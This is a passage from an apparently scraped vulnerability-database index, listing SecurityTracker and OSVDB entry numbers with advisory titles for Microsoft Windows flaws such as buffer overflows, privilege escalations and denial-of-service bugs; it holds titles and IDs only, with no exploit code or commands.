Flaw May Let Remote Users Restart the Authentication Service [1009761] Microsoft Windows COM Object Identifier Creation Flaw May Let Remote Users Cause Applications to Open Network Ports [1009758] Microsoft Windows RCP Memory Leak Lets Remote Users Deny Service [1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service [1009359] Microsoft Windows Media Services Can Be Crashed By Remote Users [1009181] Microsoft Windows Explorer Heap Overflow in Processing '.emf' Files Permits Code Execution [1009008] Microsoft Windows Internet Naming Service (WINS) Length Validation Flaw Lets Remote Users Deny Service [1008699] Microsoft Windows Buffer Overflow in MDAC Lets Remote Users Execute Arbitrary Code [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1008146] Microsoft Windows Workstation Service (wkssvc.dll) Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Privileges [1007933] Microsoft Windows Messenger Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With Local System Privileges [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1007874] Microsoft Windows OS PostThreadMessage() API Permits Local Users to Terminate Processes That Have Message Queues [1007615] Microsoft Windows NetBIOS Name Service May Disclose Memory Contents to Remote Users [1007281] Microsoft Windows NT File Management Flaw May Let Remote Users Crash Certain Applications [1007214] Microsoft Windows XP Shell Buffer Overflow in Processing Folder Display Attributes Permits Remote Code Execution [1007152] Microsoft Windows 2000 Accessibility Utility Manager Lets Local Users Gain Elevated Privileges [1007099] Microsoft Windows 2000 ShellExecute() Buffer Overflow May Let Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1007059] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Has Another Buffer Overflow That Lets Remote Execute Arbitrary Code [1007057] Microsoft Windows Media Player Access Control Flaw Lets Remote Users View, Modify, and Delete Media Library Metadata [1006959] Microsoft Windows Server 2003 Drivers May Leak Information From Memory Via Ethernet Packets Containing TCP Streams [1006866] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Lets Remote Execute Arbitrary Code [1006803] Microsoft Windows Can Be Crashed By Remote Users via Malformed NetMeeting URLs [1006588] Microsoft Windows OS Kernel Messaging Buffer Overflow Lets Local Users Gain Full Control of the System [1006580] Microsoft Windows 2003 'win2k.sys' Printing Bug Lets Users Crash the System [1006532] Microsoft Windows VM Input Validation Flaw in ByteCode Verifier Lets Malicious Java Applets Execute Arbitrary Code [1006447] Microsoft Windows Terminal Services RDP Implementation Does Not Validate Server Identity, Allowing Man-in-the-Middle Attacks [1006323] Microsoft Windows Buffer Overflow in Windows Script Engine JScript.DLL Lets Remote Users Execute Arbitrary Code [1006286] Microsoft Windows 2000/XP PostMessage() API Flaw May Let Local Users Grab Passwords from Local Dialog Boxes [1006179] Microsoft Windows Me Help and Support Center URL Handler Overflow Lets Remote Users Execute Arbitrary Code [1006121] Microsoft Windows 'riched20.DLL' Buffer Overflow May Let Remote Users Crash Applications [1006045] Microsoft Windows XP Redirector Buffer Overflow May Let Local Users Gain System Level Privileges [1005986] Microsoft Windows Terminal Server MSGINA.DLL Flaw Lets Remote Authenticated Users Reboot the Server [1005859] Microsoft Windows File Protection Mechanism Weakness in Trusting Code-Signing Certificate Chains Lets Arbitrary Remote Users Sign Code That Will Be Trusted By Windows [1005858] Microsoft Windows File Protection Weakness May Let Local Users Replace Code With Previous Vulnerable Versions Without Detection [1005833] Microsoft Windows XP Shell Buffer Overflow in Processing Audio Files Allows Remote Users to Execute Arbitrary Code [1005799] Microsoft Windows OS Bug in Processing WM_TIMER Messages May Let Local Users Gain Elevated Privileges [1005761] Microsoft Windows XP Wireless LAN Support May Disclose Access Point Information to Remote Users [1005454] Microsoft Windows Media Player for Solaris Uses Unsafe Default Permissions [1005343] Microsoft Windows Help System Bug in Processing Compiled HTML Help Files Lets Remote Users Execute Arbitrary Commands in the Local Computer Security Zone [1005336] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Files to Be Created [1005335] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Code to Be Executed [1005332] Microsoft Windows Help System Buffer Overflow in 'hhctrl.ocx' Lets Remote Users Execute Arbitrary Code [1005256] (Vendor Issues Fix) Microsoft Windows XP Remote Desktop Implementation Bug Lets Remote Users Crash the Operating System [1005242] Microsoft Windows XP Remote Desktop Can Be Crashed By Remote Users Sending a Modified RDP Packet [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1005108] Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them [1005070] Microsoft Internet Explorer (IE) Browser Error Message Processing Allows Remote Users to Execute Arbitrary Code on Certain Windows 98 Platforms [1005068] Microsoft NTFS Filesystem in Windows NT and Windows 2000 Has Auditing Hole That Lets Local Users Access Files Without the File Access Being Audited [1005063] Microsoft Windows XP Help and Support Center Hole Lets Remote Users Create URLs That, When Loaded, Will Delete Arbitrary Files on Your System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004357] Microsoft Windows Debugging Facility for Windows NT4 and 2000 Has Authentication Hole That Lets Local Users Execute Arbitrary Code with SYSTEM Privileges [1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition [1004083] Microsoft Windows 2000 'microsoft-ds' Service Flaw Allows Remote Users to Create Denial of Service Conditions By Sending Malformed Packets [1004022] Microsoft Windows 2000 Group Policy Object Enforcement Can Be Circumvented if User License Limits are Exceeded [1003975] Microsoft Windows NT, 2000, and XP Kernel Buffer Overflow in Processing Multiple UNC Provider (MUP) Requests May Let Local Users Obtain System Level Privileges [1003949] Microsoft Windows 2000 DCOM Implementation Flaw May Disclose Memory Contents to Remote Users [1003816] Microsoft Windows 2000 Automatic Log Off Policy Fails to Expire Sessions in Progress [1003764] Microsoft Windows Operating System Shell URL Handler Bug Lets Remote Users Create HTML That Could Cause Arbitrary Code to Be Executed on Another User's System in Certain Situations [1003687] Microsoft Windows 2000 and Windows XP SMTP Service Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003686] Microsoft Windows SMTP Service Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003633] Microsoft XML Core Services in Microsoft Windows XP Operating System Lets Remote Scripts Access and Send Local Files [1003591] Microsoft Windows Terminal Services May Cause the System's Screen Saver Lockout Mechanism to Fail in Certain Situations [1003472] Microsoft Telnet Server for Windows 2000 and for Interix Has a Buffer Overflow That May Let Remote Users Execute Code on the Server with System Level Privileges [1003402] Microsoft Windows NT 4.0 and Windows 2000 Domain Controllers May Give Elevated Privileges to Remote Users Who Are Valid Administrators on Other Trusted Domains [1003369] PGPfire Personal Firewall for Microsoft Windows Discloses Identifying Information to Remote Users [1003310] Microsoft Windows NT/2000 Authentication Lockout Bug May Record Successful Logins as Failed Login Attempts in Certain Situations [1003308] Microsoft Windows XP Manifest Processing Bug Lets Local Users Corrupt the System and Cause the Boot Process to Fail [1003257] Microsoft Windows XP Upgrade Effectively Removes Patches from Internet Explorer (IE) During Upgrade, Leaving Users Exposed to IE Vulnerabilities [1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC [1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users [1003221] Microsoft Internet Explorer (IE) Default Configuration Allows HTML-based Scripts to Access Your Windows Clipboard Contents [1003201] Microsoft Windows 95 Backup Utility Has Buffer Overflow That Could Cause Denial of Service Conditions [1003121] Microsoft Windows XP Task Manager Will Not Kill Certain Processes [1003041] Microsoft Windows XP Remote Desktop Client May Disclose Recently Used Account Names to Remote Users [1003028] Microsoft Windows Universal Plug and Play Component Buffer Overflow Gives Remote Users System Level Access to Windows XP and 98/ME Hosts [1003003] Microsoft Windows XP Hot Key Function Lets Physically Local Users Execute Administrator Hot Key Functions in Certain Situations [1002979] Microsoft Windows Explorer Discloses Stored FTP Passwords to Local Users [1002926] Microsoft Windows Operating System File Locking Design May Allow Local Users to Block Group Policy Scripts [1002922] Microsoft Windows 2000 Internet Key Exchange (IKE) Service Can Be Crashed By Remote Users [1002754] Terminal Services on Microsoft Windows 2000 and XP Allow Remote Users to Log Bogus IP Addresses Instead of the User's Genuine Address [1002731] Microsoft Windows 2000 RunAs Service May Disclose Authentication Credentials to Local Users [1002730] Microsoft Windows 2000 RunAs Utility May Disclose Sensitive Information to Local Users [1002729] Microsoft Windows 2000 RunAs Service Allows Local Users to Disable the Service [1002601] Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users [1002519] TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users [1002418] Counterpane's Password Safe Password Encryption Utility for Microsoft Windows May Disclose Passwords to Local Users in Certain Situations [1002201] Microsoft Windows TCP/IP Stack Vulnerable to a Certain Man-in-the-Middle Denial of Service Attack [1002197] Microsoft Windows NNTP Network News Service Has a Memory Leak That Allows Remote Users to Cause the Server to Crash [1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program [1002105] Microsoft SQL Database Server RPC Input Validation Failure Lets Remote Users Crash the Database Service [1002104] Microsoft Exchange Server RPC Input Validation Failure Lets Remote Users Crash the Exchange Service [1002099] Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users [1002098] Windows Terminal Services in Microsoft Windows 2000 and NT 4.0 Can Be Crashed By Remote Users Due to a Memory Leak [1001993] Microsoft Windows 2000, Linux 2.4, NetBSD, FreeBSD, and OpenBSD May Let Remote Users Affect TCP Performance [1001992] Microsoft Windows NT Lets Remote Users Cause Increased Packet Overhead and Increased CPU Resource Consumption [1001931] Microsoft Windows 2000 SMTP Service May Allow Unauthorized Remote Users to Relay E-mail via the Service [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL [1001701] Microsoft Windows 2000 Telnet Server Allows Local Users to Gain System-Level Privileges and Lets Remote Users Crash the Server [1001605] Microsoft Windows 2000 Allows Local Users to Elevate Privileges [1001603] Microsoft Windows Media Player May Allow Remote Users to Execute Code Contained in Internet Shortcuts and View Files on the Media Player's Host [1001587] Microsoft Word for Windows and for Mac May Run Macros Linked By RTF Documents Without Warning [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001513] Microsoft Windows 2000 Indexing Service Allows Remote Users to View Include Programming Files [1001501] Microsoft Windows 2000 Domain Controllers Can Be Effectively Halted By Remote Users [1001467] Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System [1001464] Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server [1001360] Microsoft Windows Operating System DLL May Allow Malicious Remote Scripts to Run Code on the User's Host Without the User's Intervention [1001240] Microsoft FTP Client for Windows 2000 Still Vulnerable to Executing Arbitrary Code in Limited Situations [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords [1001110] A Microsoft German-Language Hotfix for Windows NT 4 Incorrectly Displays Some Security Events as Other Security Events OSVDB - http://www.osvdb.org: [96194] Microsoft Windows Asynchronous RPC Request Handling Remote Code Execution [83796] Microsoft Windows DCOM RPCSS.exe Local Privilege Escalation [69819] Microsoft Windows Netlogon RPC Service Crafted Request Remote DoS [68586] Microsoft Windows LRPC Server LPC Message Handling Local Privilege Escalation [68532] Microsoft Windows rpcrt4.dll LRPC_SCALL::SendRequest() Function LPC Message Local Overflow DoS [67988] Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution [67981] Microsoft Windows RPC Response Processing Remote Memory Corruption [59855] Microsoft Windows License Logging Server (llssrv.exe) RPC LlsrLicenseRequestW Method Remote Overflow [59819] Microsoft Windows RPC Session Handle Hijacking Remote Privilege Escalation [54936] Microsoft Windows RPC Marshalling Engine Internal State Manipulation Remote Code Execution [54934] Microsoft Windows Print Spooler Load Library Crafted RPC Message Arbitrary DLL Loading Privilege Escalation [53667] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation [49243] Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution [49060] Microsoft Windows Message Queuing Service RPC Request Handling Remote Code Execution [37629] Microsoft Windows 2000 RPC Authentication Unspecified Information Disclosure [37628] Microsoft Windows 2000 RPC Authentication Crafted Request Remote DoS [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [32445] Microsoft Windows Workstation Service NetrWkstaUserEnum RPC Request DoS [30823] Microsoft Windows Print Spooler (spoolsv.exe) RpcGetPrinterData Function DoS [27845] Microsoft Windows Server Service Crafted RPC Message Remote Overflow [26438] Microsoft Windows RPC Mutual Authentication Server Spoofing [26436] Microsoft Windows RASMAN RPC Request Remote Overflow [25335] Microsoft Windows Distributed Transaction Coordinator (DTC) CRpcIoManagerServer::BuildContext Function Remote Overflow [17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure [17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration [13414] Microsoft Windows RPC Endpoint Manager Malformed Packet Remote DoS [13020] Microsoft Windows XP RPC Cache Memory Leak [11797] Microsoft Windows DCOM RPCSS Service DCERPC Packet Overflow [11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation [11265] Microsoft Windows NT Malformed RPC Packet Error Message Loop DoS (snork) [11159] Microsoft Windows NT Invalid RPC Named Pipe Saturation DoS [10686] Microsoft Windows NT RPC Library Arbitrary Memory Manipulation [7117] Microsoft Windows RPC Locator Remote Overflow [5247] Microsoft Windows DCOM RPC Object Identity Information Disclosure [5246] Microsoft Windows CIS/RPC Over HTTP DoS [5245] Microsoft Windows RPCSS Large Length Field DoS [2670] Microsoft Windows RPC Race Condition DoS [2535] Microsoft Windows DCOM RPCSS Service Filename Parameter Overflow [2100] Microsoft Windows RPC DCOM Interface Overflow [1095] Microsoft Windows NT RPC Locator (RPCSS.EXE) CPU Utilization DoS [673] Microsoft Windows NT RPC Endpoint Mapper Malformed Request DoS [408] Microsoft Windows Malformed DCE/RPC SMBwriteX Request DoS [398] Microsoft Windows 2000 Malformed RPC Traffic Local Security Policy Corruption DoS [96197] Microsoft Windows TCP/IP Stack Crafted ICMPv6 Packet Handling Remote DoS [96195] Microsoft Windows NAT Driver Crafted ICMP Packet Handling Remote Memory Corruption DoS [96193] Microsoft Windows Unicode Scripts Processor (USP10.DLL) Uniscribe Font Parsing Engine Unspecified Memory Corruption [96180] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3196) [96179] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3197) [96178] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3198) [95667] Microsoft Windows XP Wireless Preferred Network List (PNL) Remote Disclosure [95589] Microsoft Windows Mobile Wireless Preferred Network List (PNL) Remote Disclosure [94987] Microsoft Windows Defender Improper Pathname Handling Local Privilege Escalation [94986] Microsoft Windows Media Format Runtime Media File Handling Arbitrary Code Execution [94985] Microsoft Windows DirectShow GIF File Handling Memory Overwrite Arbitrary Code Execution [94966] Microsoft Windows win32k.sys Memory Object Dereference Handling Local Privilege Escalation [94965] Microsoft Windows win32k.sys Memory Object Allocation Handling Local Privilege Escalation [94964] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [94963] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow DoS [94962] Microsoft Windows win32k.sys Memory Object Handling Local Information Disclosure [94961] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [94126] Microsoft Windows Print Spooler Printer Deletion Memory Handling Local Privilege Escalation [94125] Microsoft Windows TCP/IP Driver TCP Connection Crafted Packet Handling Remote Integer Overflow DoS [94124] Microsoft Windows Kernel Page Fault System Call Handling Local Information Disclosure [93539] Microsoft Windows win32k.sys EPATHOBJ::pprFlattenRec / EPATHOBJ::bFlatten Functions Local Privilege Escalation [93320] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [93319] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [93318] Microsoft Windows DirectX Graphics Kernel Subsystem (dxgkrnl.sys) Memory Object Handling Local Privilege Escalation [93317] Microsoft Windows Essentials Windows Writer Crafted URL Handling Arbitrary File Overwrite [93300] Microsoft Windows HTTP Protocol Stack (HTTP.sys) Crafted HTTP Header Handling Infinite Loop Remote DoS [92133] Microsoft Windows NTFS NULL Pointer Dereference Local Privilege Escalation [92132] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1292) [92131] Microsoft Windows win32k.sys Crafted Font File Handling DoS [92130] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1283) [92127] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unspecified Local Memory Corruption [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [92125] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1294) [92124] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1284) [92122] Microsoft Windows Remote Desktop Client ActiveX (mstscax.dll) Use-after-free Arbitrary Code Execution [91696] Microsoft Windows Modern Mail Unspecified Spoofing Weakness [91269] Microsoft Windows 8 TrueType Font (TTF) Handling Unspecified DoS [91195] Microsoft Windows 7 Unspecified ASLR Protection Mechanism Bypass [91194] Microsoft Windows 7 Kernel Unspecified Local Privilege Escalation (pwn2own) [91193] Microsoft Windows 7 Unspecified ASLR / DEP Protection Mechanism Bypass (pwn2own) [91157] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1287) [91156] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1286) [91155] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1285) [90257] Microsoft Windows Server 2003 ICACLS.EXE Permission Inheritance Weakness [90236] Microsoft Windows ZwSetInformationProcess() Function Process Priority Handling Local DoS [90166] Microsoft Windows Object Linking and Embedding (OLE) Automation Memory Allocation RTF File Handling Arbitrary Code Execution [90165] Microsoft Windows Win32.sys CSRSS Memory Object Handling Local Privilege Escalation [90164] Microsoft Windows TCP/IP Stack Crafted Connection Termination Packet (TCP PIN WAIT) Handling Remote DoS [90163] Microsoft Windows Memory Object Reference Count Handling Local Privilege Escalation [90162] Microsoft Windows Memory Object Handling Local Privilege Escalation (2013-1279) [90161] Microsoft Windows ApphelpCacheLookupEntry Function Memory Object Handling Local Privilege Escalation [90160] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1277) [90159] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1276) [90158] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1275) [90157] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1274) [90156] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1273) [90155] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1272) [90154] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1271) [90153] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1270) [90152] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1269) [90151] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1268) [90150] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1267) [90149] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1266) [90148] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1265) [90147] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1264) [90146] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1263) [90145] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1262) [90144] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1261) [90143] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1260) [90142] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1259) [90141] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1258) [90140] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1257) [90139] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1256) [90138] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1255) [90137] Microsoft Windows win32k.sys SfnINOUTSTYLECHANGE Function Memory Object Handling Local Privilege Escalation [90136] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1253) [90135] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1252) [90134] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1251) [90133] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1250) [90132] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1249) [90131] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1248) [90130] Microsoft .NET Framework Windows Form Object Creation Callback Function Arbitrary Code Execution [90129] Microsoft Windows NFS Server Read-only Share File Operation Handling Remote DoS [90128] Microsoft Windows Media Content Handling Arbitrary Code Execution [89315] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [89157] Microsoft Windows IPv6 Router Advertisement (RA) Flooding Weakness [88967] Microsoft Windows SSL/TLS Forced Downgrade MitM Weakness [88966] Microsoft Windows win32k.sys Window Broadcast Message Handling Local Privilege Escalation [88963] Microsoft .NET Framework Windows Forms (WinForms) Component System.Drawing.Imaging.EncoderParameters.ConvertToMemory() Method this.param.Length Parameter Multiple Application Handling Heap Buffer Overflow [88956] Microsoft Windows Printer Spooler Service Print Job Handling Memory Corruption [88836] Microsoft Windows Paint BMP Image Parsing Memory Corruption [88575] Microsoft Windows NT NtAcceptConnectPort Spoofed LPC Port Request Arbitrary Process Hijacking Weakness [88320] Microsoft Windows TrueType Font (TTF) Parsing Unspecified Arbitrary Code Execution [88316] Microsoft Windows OpenType Font (OTF) Parsing Unspecified Arbitrary Code Execution [88313] Microsoft Windows KERNEL32.DLL Filename Parsing Memory Corruption Privilege Escalation [88312] Microsoft Windows DirectPlay Office File Handling Heap Overflow [88051] Microsoft Windows Crafted DHCPv6 Message Remote DoS [87269] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2553) [87268] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2530) [87260] Microsoft Windows Briefcase Handling Underflow (2012-1527) [87259] Microsoft Windows Briefcase Handling Underflow (2012-1528) [86905] Microsoft Windows NTFS ANSI API File Name Truncation Weakness [86903] Microsoft Windows NT CSRSS Malformed Console I/O Local DoS [86866] Microsoft Windows Trusted Publisher Certificate Process Injection UAC Protection Bypass [86865] Microsoft Windows UAC Protection User-assisted Circumvention [86839] Microsoft Windows Media Player AVI File Handling Divide-by-Zero DoS [86768] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Handling Buffer Overflow [86061] Microsoft Windows Server 2008 R1 CSRSS ReadConsole / CloseHandle Local DoS [86060] Microsoft Windows Kerberos Implementation Session Handling Remote DoS [86058] Microsoft Windows Kernel Unspecified Memory Object Handling Local Overflow [85840] Microsoft Windows lpApplicationName Function Path Subversion Local Privilege Escalation [85749] Microsoft Windows win32k.sys TrueType Font File Handling Buffer Overflow [85619] Microsoft Windows Phone 7 X.509 Certificate Subject's Common Name (CN) Field Domain Name Validation Multiple Protocol SSL Server MitM Spoofing Weakness [85444] Microsoft Windows NT MSIEXEC Registry Modification Local Privilege Escalation [85442] Microsoft Windows NT Predictable LPC Message Identifier Weakness [85418] Microsoft Windows Share Service File Handle Request Saturation Remote DoS [85039] Microsoft Windows NT LPC Zone Exhaustion Local DoS [85038] Microsoft Windows Filename Extension Handling Overflow DoS [84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption [84603] Microsoft Windows win32k.sys Use-after-free Local Privilege Escalation [84602] Microsoft Windows Remote Desktop Services Malformed RDP Packet Parsing Remote Code Execution [84601] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Stack Overflow [84600] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Heap Overflow [84599] Microsoft Windows Print Spooler Service Remote Format String [84598] Microsoft Windows netapi32.dll Remote Administration Protocol Malformed RAP Request Parsing Remote DoS [84593] Microsoft Multiple Product Windows Common Controls TabStrip ActiveX (MSCOMCTL.OCX) Document Handling Arbitrary Code Execution [83751] Microsoft Windows Terminal Services LCA Issued Certificates Arbitrary Binary Signing Weakness [83750] Microsoft Windows Gadgets Unspecified Remote Code Execution [83660] Microsoft Windows TLS Protocol HTTPS Session Decryption Information Disclosure [83659] Microsoft Windows win32k.sys Keyboard Layout Handling Local Privilege Escalation [83658] Microsoft Windows win32k.sys Hook Procedure Creation Incorrect Type Handling Local Privilege Escalation [83657] Microsoft Windows ADO Cachesize Data Access Components Memory Object Handling Overflow [83656] Microsoft Windows File / Directory Name Handling Remote Code Execution [83453] Microsoft Windows ProfileList Registry Key Permission Weakness User Profile Subversion [83169] Microsoft Windows NT telnetd Service Port Scan Remote DoS [83126] Microsoft Windows NT Registry Plaintext Service Password Local Disclosure [82928] Microsoft Windows atmfd.dll OpenType Font (OTF) File Handling DoS [82858] Microsoft Windows win32k.sys Thread Creation Attempt Handling Race Condition Local Privilege Escalation [82857] Microsoft Windows TrueType Font Loading Font Resource Reference Counter Handling Local Overflow [82856] Microsoft Windows win32k.sys Clipboard Format Atom Name Handling Local Privilege Escalation [82855] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1865) [82854] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1864) [82851] Microsoft Windows Remote Desktop Protocol (RDP) Memory Object Handling Remote Code Execution [82850] Microsoft Windows User Mode Scheduler Memory Corruption Local Privilege Escalation [82849] Microsoft Windows BIOS Memory Handling ROM Corruption Local Privilege Escalation [82693] Microsoft Windows Terminal Server Licensing Service MD5 Hash Collision Code Signing Spoofing [82605] Microsoft Windows Explorer Crafted Subdirectory Parent Directory Deletion Local DoS [82604] Microsoft Windows Media Player Streamed Broadcast Handling Remote Overflow [82505] Microsoft Windows IE Instances Overflow Group Policy Bypass [82491] Microsoft Windows UTF Character Set File Extension Spoofing Weakness [81736] Microsoft Windows GDI+ EMF File Record Handling Remote Code Execution [81735] Microsoft Windows Partition Manager (partmgr.sys) PnP Configuration Manager Function Call Handling Local Privilege Escalation [81730] Microsoft Windows tcpip.sys Outbound Packet Filtering Windows Firewall Bypass [81729] Microsoft Windows tcpip.sys Double-free IPv6 Address Binding Parsing Local Privilege Escalation [81720] Microsoft Windows t2embed.dll Module TTF File Handling Remote Code Execution [81717] Microsoft Windows win32k.sys Scrollbar Calculation Handling Local Privilege Escalation [81716] Microsoft Windows win32k.sys Keyboard Layout File Handling Local Privilege Escalation [81715] Microsoft Windows win32k.sys Windows and Messages Handling Local Privilege Escalation [81699] Microsoft Windows xxxCreateWindowEx() Function Invalid Memory Access Local DoS [81135] Microsoft Windows Authenticode Signature Verification Functionality Signed Portable Executable File Digest Validation Remote Code Execution [80005] Microsoft Windows DNS Server Domain Resource Record Query Parsing Remote DoS [80004] Microsoft Windows Remote Desktop Protocol Terminal Server RDP Packet Parsing Remote DoS [80003] Microsoft Windows DirectWrite Unicode Character Parsing Remote DoS [80002] Microsoft Windows win32k.sys PostMessage() Function Local Privilege Escalation [80000] Microsoft Windows Remote Desktop Protocol Array Element Loading Handling Double-free Remote Code Execution [79442] Microsoft Windows Server 2008 DNS Server Service Cache Update Policy Deleted Domain Name Resolving Weakness [79269] Microsoft Windows win32k.sys Use-after-free Keyboard Layout Memory Dereference Local Privilege Escalation [79259] Microsoft Windows C Run-Time Library msvcrt.dll Meta File Handling Remote Overflow [79253] Microsoft Windows Ancillary Function Driver (afd.sys) User Mode Input Parsing Local Privilege Escalation [79252] Microsoft Windows Ancillary Function Driver (afd.sys) AfdPoll User Mode Input Parsing Local Privilege Escalation [79117] Microsoft Windows Program Group Path Subversion Arbitrary DLL Injection Code Execution [78759] Microsoft Windows ICMPv6 Echo Request Remote Promiscuous Mode Detection [78212] Microsoft Windows Object Packager Path Subversion packager.exe Loading Remote Code Execution [78211] Microsoft Windows Line21 DirectShow Filter Media File Handling Remote Code Execution [78210] Microsoft Windows Multimedia Library (winmm.dll) MIDI File Handling Remote Code Execution [78209] Microsoft Windows Ntdll.dll Structured Exception Handling Tables Loading SafeSEH Security Bypass [78207] Microsoft Windows Embedded ClickOnce Application Office File Handling Remote Code Execution [78206] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unicode Character Parsing Local Privilege Escalation [78010] Microsoft Windows Phone Text Message Parsing Remote DoS [77908] Microsoft Windows win32k.sys Safari IFRAME 